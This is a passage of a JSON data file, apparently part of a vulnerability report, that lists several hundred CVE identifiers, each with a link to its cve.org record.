"url": "https://www.cve.org/CVERecord?id=CVE-2025-21918"
},
{
"name": "CVE-2025-38203",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38203"
},
{
"name": "CVE-2023-45285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45285"
},
{
"name": "CVE-2022-0909",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0909"
},
{
"name": "CVE-2025-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8176"
},
{
"name": "CVE-2023-28154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28154"
},
{
"name": "CVE-2023-48231",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48231"
},
{
"name": "CVE-2025-55752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55752"
},
{
"name": "CVE-2023-38633",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38633"
},
{
"name": "CVE-2025-21948",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21948"
},
{
"name": "CVE-2023-2609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2609"
},
{
"name": "CVE-2025-53905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2021-46312",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46312"
},
{
"name": "CVE-2018-14628",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14628"
},
{
"name": "CVE-2022-21299",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21299"
},
{
"name": "CVE-2022-38476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38476"
},
{
"name": "CVE-2019-6461",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6461"
},
{
"name": "CVE-2022-3515",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3515"
},
{
"name": "CVE-2025-38004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38004"
},
{
"name": "CVE-2020-2773",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2773"
},
{
"name": "CVE-2015-5262",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-5262"
},
{
"name": "CVE-2022-43244",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43244"
},
{
"name": "CVE-2024-24783",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24783"
},
{
"name": "CVE-2025-21753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21753"
},
{
"name": "CVE-2017-6004",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6004"
},
{
"name": "CVE-2023-45284",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45284"
},
{
"name": "CVE-2015-7696",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7696"
},
{
"name": "CVE-2023-29403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29403"
},
{
"name": "CVE-2025-38387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38387"
},
{
"name": "CVE-2023-45922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45922"
},
{
"name": "CVE-2015-4754",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4754"
},
{
"name": "CVE-2025-21699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21699"
},
{
"name": "CVE-2025-38362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38362"
},
{
"name": "CVE-2022-27776",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27776"
},
{
"name": "CVE-2023-45322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
},
{
"name": "CVE-2024-24791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2022-39046",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-39046"
},
{
"name": "CVE-2020-14578",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14578"
},
{
"name": "CVE-2025-21584",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21584"
},
{
"name": "CVE-2022-42916",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42916"
},
{
"name": "CVE-2025-40004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40004"
},
{
"name": "CVE-2017-7619",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7619"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2020-2805",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2805"
},
{
"name": "CVE-2025-21712",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21712"
},
{
"name": "CVE-2025-38371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38371"
},
{
"name": "CVE-2023-2731",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2731"
},
{
"name": "CVE-2025-58767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58767"
},
{
"name": "CVE-2021-35939",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35939"
},
{
"name": "CVE-2024-57982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57982"
},
{
"name": "CVE-2025-38445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38445"
},
{
"name": "CVE-2024-38819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38819"
},
{
"name": "CVE-2023-0803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0803"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2025-21746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21746"
},
{
"name": "CVE-2022-0391",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0391"
},
{
"name": "CVE-2023-1170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1170"
},
{
"name": "CVE-2022-24070",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24070"
},
{
"name": "CVE-2025-38461",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38461"
},
{
"name": "CVE-2019-17547",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17547"
},
{
"name": "CVE-2024-45341",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
},
{
"name": "CVE-2021-36411",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36411"
},
{
"name": "CVE-2023-30774",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30774"
},
{
"name": "CVE-2018-10919",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10919"
},
{
"name": "CVE-2024-13176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
},
{
"name": "CVE-2020-2830",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2830"
},
{
"name": "CVE-2025-53014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53014"
},
{
"name": "CVE-2025-7962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7962"
},
{
"name": "CVE-2022-21624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21624"
},
{
"name": "CVE-2020-2781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2781"
},
{
"name": "CVE-2023-28322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28322"
},
{
"name": "CVE-2018-10804",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10804"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2022-0907",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0907"
},
{
"name": "CVE-2021-3421",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3421"
},
{
"name": "CVE-2022-21305",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21305"
},
{
"name": "CVE-2025-38066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38066"
},
{
"name": "CVE-2023-29405",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29405"
},
{
"name": "CVE-2021-3670",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3670"
},
{
"name": "CVE-2021-38297",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38297"
},
{
"name": "CVE-2025-4373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4373"
},
{
"name": "CVE-2015-4790",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4790"
},
{
"name": "CVE-2025-4598",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4598"
},
{
"name": "CVE-2025-27144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27144"
},
{
"name": "CVE-2025-21836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21836"
},
{
"name": "CVE-2025-21715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21715"
},
{
"name": "CVE-2024-6174",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6174"
},
{
"name": "CVE-2022-30629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30629"
},
{
"name": "CVE-2020-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10735"
},
{
"name": "CVE-2025-38305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38305"
},
{
"name": "CVE-2020-14556",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14556"
},
{
"name": "CVE-2025-38067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38067"
},
{
"name": "CVE-2025-50085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50085"
},
{
"name": "CVE-2025-21781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21781"
},
{
"name": "CVE-2024-58054",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58054"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2020-14792",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14792"
},
{
"name": "CVE-2019-16776",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16776"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2023-6779",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6779"
},
{
"name": "CVE-2022-28738",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28738"
},
{
"name": "CVE-2023-5363",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5363"
},
{
"name": "CVE-2024-8508",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8508"
},
{
"name": "CVE-2023-45289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45289"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2022-49043",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
},
{
"name": "CVE-2015-2624",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2624"
},
{
"name": "CVE-2022-2068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2068"
},
{
"name": "CVE-2025-40364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40364"
},
{
"name": "CVE-2023-29491",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29491"
},
{
"name": "CVE-2025-38068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38068"
},
{
"name": "CVE-2025-61985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61985"
},
{
"name": "CVE-2013-2064",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-2064"
},
{
"name": "CVE-2025-38401",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38401"
},
{
"name": "CVE-2025-21772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21772"
},
{
"name": "CVE-2021-20266",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20266"
},
{
"name": "CVE-2022-21271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21271"
},
{
"name": "CVE-2024-58070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58070"
},
{
"name": "CVE-2025-61919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61919"
},
{
"name": "CVE-2023-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25193"
},
{
"name": "CVE-2024-34447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34447"
},
{
"name": "CVE-2020-25663",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25663"
},
{
"name": "CVE-2022-0156",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0156"
},
{
"name": "CVE-2025-21914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21914"
},
{
"name": "CVE-2024-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58057"
},
{
"name": "CVE-2025-0306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0306"
},
{
"name": "CVE-2025-1371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1371"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2024-58007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58007"
},
{
"name": "CVE-2023-1355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1355"
},
{
"name": "CVE-2025-21995",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21995"
},
{
"name": "CVE-2023-0466",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
},
{
"name": "CVE-2025-21868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21868"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2025-5372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5372"
},
{
"name": "CVE-2022-27782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27782"
},
{
"name": "CVE-2022-37967",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37967"
},
{
"name": "CVE-2022-22844",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22844"
},
{
"name": "CVE-2025-21915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21915"
},
{
"name": "CVE-2019-13232",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13232"
},
{
"name": "CVE-2025-27210",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27210"
},
{
"name": "CVE-2025-38102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38102"
},
{
"name": "CVE-2024-33600",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33600"
},
{
"name": "CVE-2025-21792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21792"
},
{
"name": "CVE-2015-2654",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2654"
},
{
"name": "CVE-2025-55560",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55560"
},
{
"name": "CVE-2025-21728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21728"
},
{
"name": "CVE-2024-58018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58018"
},
{
"name": "CVE-2023-42669",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42669"
},
{
"name": "CVE-2022-1210",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1210"
},
{
"name": "CVE-2025-61771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61771"
},
{
"name": "CVE-2023-0465",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
},
{
"name": "CVE-2025-61770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61770"
},
{
"name": "CVE-2022-32148",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32148"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2015-4778",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4778"
},
{
"name": "CVE-2023-42670",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42670"
},
{
"name": "CVE-2022-4203",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4203"
},
{
"name": "CVE-2024-58090",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58090"
},
{
"name": "CVE-2025-59842",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59842"
},
{
"name": "CVE-2025-49125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49125"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2024-27766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27766"
},
{
"name": "CVE-2025-37958",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37958"
},
{
"name": "CVE-2025-21714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21714"
},
{
"name": "CVE-2024-58078",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58078"
},
{
"name": "CVE-2023-32636",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
},
{
"name": "CVE-2023-6277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6277"
},
{
"name": "CVE-2025-48060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48060"
},
{
"name": "CVE-2025-21855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21855"
},
{
"name": "CVE-2025-38399",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38399"
},
{
"name": "CVE-2025-21972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21972"
},
{
"name": "CVE-2025-38065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38065"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2024-21510",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21510"
},
{
"name": "CVE-2023-34153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34153"
},
{
"name": "CVE-2023-3618",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3618"
},
{
"name": "CVE-2020-14153",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14153"
},
{
"name": "CVE-2022-1114",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1114"
},
{
"name": "CVE-2023-48233",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48233"
},
{
"name": "CVE-2025-38412",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38412"
},
{
"name": "CVE-2025-38031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38031"
},
{
"name": "CVE-2023-4813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4813"
},
{
"name": "CVE-2022-21626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21626"
},
{
"name": "CVE-2011-2207",
"url": "https://www.cve.org/CVERecord?id=CVE-2011-2207"
},
{
"name": "CVE-2025-54874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54874"
},
{
"name": "CVE-2017-3617",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3617"
},
{
"name": "CVE-2024-53124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53124"
},
{
"name": "CVE-2025-38293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38293"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21830"
},
{
"name": "CVE-2018-12600",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12600"
},
{
"name": "CVE-2025-4877",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4877"
},
{
"name": "CVE-2021-41771",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41771"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2020-14781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14781"
},
{
"name": "CVE-2016-3189",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-3189"
},
{
"name": "CVE-2023-4154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4154"
},
{
"name": "CVE-2025-38184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38184"
},
{
"name": "CVE-2017-3615",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3615"
},
{
"name": "CVE-2022-0714",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0714"
},
{
"name": "CVE-2023-45290",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45290"
},
{
"name": "CVE-2023-28320",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28320"
},
{
"name": "CVE-2025-9340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9340"
},
{
"name": "CVE-2023-24758",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24758"
},
{
"name": "CVE-2025-55552",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55552"
},
{
"name": "CVE-2025-30683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30683"
},
{
"name": "CVE-2025-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30699"
},
{
"name": "CVE-2025-61921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61921"
},
{
"name": "CVE-2024-4030",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4030"
},
{
"name": "CVE-2025-27587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27587"
},
{
"name": "CVE-2016-7531",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-7531"
},
{
"name": "CVE-2006-3082",
"url": "https://www.cve.org/CVERecord?id=CVE-2006-3082"
},
{
"name": "CVE-2023-5341",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5341"
},
{
"name": "CVE-2025-8534",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8534"
},
{
"name": "CVE-2025-21767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21767"
},
{
"name": "CVE-2025-3262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3262"
},
{
"name": "CVE-2025-21986",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21986"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2025-1390",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1390"
},
{
"name": "CVE-2024-33599",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33599"
},
{
"name": "CVE-2023-34968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34968"
},
{
"name": "CVE-2024-0743",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0743"
},
{
"name": "CVE-2025-21961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21961"
},
{
"name": "CVE-2025-38458",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38458"
},
{
"name": "CVE-2025-6297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6297"
},
{
"name": "CVE-2016-10062",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10062"
},
{
"name": "CVE-2025-21764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21764"
},
{
"name": "CVE-2024-57974",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57974"
},
{
"name": "CVE-2024-58093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58093"
},
{
"name": "CVE-2023-34152",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34152"
},
{
"name": "CVE-2022-43249",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43249"
},
{
"name": "CVE-2025-38034",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38034"
},
{
"name": "CVE-2024-58085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58085"
},
{
"name": "CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"name": "CVE-2017-3608",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3608"
},
{
"name": "CVE-2025-47268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47268"
},
{
"name": "CVE-2025-21690",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21690"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-57996",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57996"
},
{
"name": "CVE-2025-38135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38135"
},
{
"name": "CVE-2023-28484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28484"
},
{
"name": "CVE-2022-43242",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43242"
},
{
"name": "CVE-2019-2708",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-2708"
},
{
"name": "CVE-2025-38312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38312"
},
{
"name": "CVE-2016-0692",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0692"
},
{
"name": "CVE-2019-14844",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14844"
},
{
"name": "CVE-2022-21366",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21366"
},
{
"name": "CVE-2022-30630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30630"
},
{
"name": "CVE-2025-22233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22233"
},
{
"name": "CVE-2025-38464",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38464"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-21838",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21838"
},
{
"name": "CVE-2025-21982",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21982"
},
{
"name": "CVE-2025-21867",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21867"
},
{
"name": "CVE-2025-21666",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21666"
},
{
"name": "CVE-2023-0802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0802"
},
{
"name": "CVE-2025-53859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53859"
},
{
"name": "CVE-2023-46219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46219"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2025-21828",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21828"
},
{
"name": "CVE-2023-47038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47038"
},
{
"name": "CVE-2025-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23167"
},
{
"name": "CVE-2025-38363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38363"
},
{
"name": "CVE-2025-21704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21704"
},
{
"name": "CVE-2025-21936",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21936"
},
{
"name": "CVE-2022-0865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0865"
},
{
"name": "CVE-2023-5981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5981"
},
{
"name": "CVE-2025-38319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38319"
},
{
"name": "CVE-2025-43859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43859"
},
{
"name": "CVE-2024-58013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58013"
},
{
"name": "CVE-2022-0529",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0529"
},
{
"name": "CVE-2023-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27043"
},
{
"name": "CVE-2016-7514",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-7514"
},
{
"name": "CVE-2015-4782",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4782"
},
{
"name": "CVE-2025-21909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21909"
},
{
"name": "CVE-2022-2056",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2056"
},
{
"name": "CVE-2025-9092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9092"
},
{
"name": "CVE-2025-21766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21766"
},
{
"name": "CVE-2025-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38457"
},
{
"name": "CVE-2024-54677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54677"
},
{
"name": "CVE-2021-3598",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3598"
},
{
"name": "CVE-2025-21880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21880"
},
{
"name": "CVE-2025-50094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50094"
},
{
"name": "CVE-2021-35559",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35559"
},
{
"name": "CVE-2025-21959",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21959"
},
{
"name": "CVE-2024-38809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38809"
},
{
"name": "CVE-2025-38212",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38212"
},
{
"name": "CVE-2017-3610",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3610"
},
{
"name": "CVE-2023-1264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1264"
},
{
"name": "CVE-2023-0217",
